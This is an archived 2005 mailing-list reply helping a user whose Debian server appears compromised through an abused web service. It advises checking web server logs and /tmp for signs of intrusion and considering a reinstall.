[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: a compromised machine

On Sun, Jul 24, 2005 at 09:54:28AM +0200, Nejc Novak wrote:
> I think one of my servers has been compromised. Since i don't have a lot 
> of experiencei with these things, i beg you for your help.
> Information i have gathered together till now are the following. Server 
> is runnin latest debian stable, sarge.
> There was heavy traffic on the server and ps aux reported several 
> processes:
> www-data  2459  0.0  0.1  1616  608 ?        S    01:31   0:00 
> /tmp/dlciiqlno x

Since the process runs as "www-data" some kiddy has abused a web service
on your server to download and run an external software. Look for
suspicious log lines of your web server.

Examples of hacks on our servers: - - [26/Feb/2005:20:04:59 +0100] "GET
HTTP/1.1" 200 422 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1; SV1; FunWebProducts)"


211-255-23-42.rev.krline.net - - [04/Dec/2004:17:43:06 +0100] "GET
1.0" 200 28732 "-" "PHP/4.3.4"

It should be rather easy finding signs of weird accesses like %20 or
chr(). Also look for weird signs in /tmp.

If your server is important you should consider reinstalling.

".signature" [Modified] 3 lines --100%--                3,41         All

Reply to: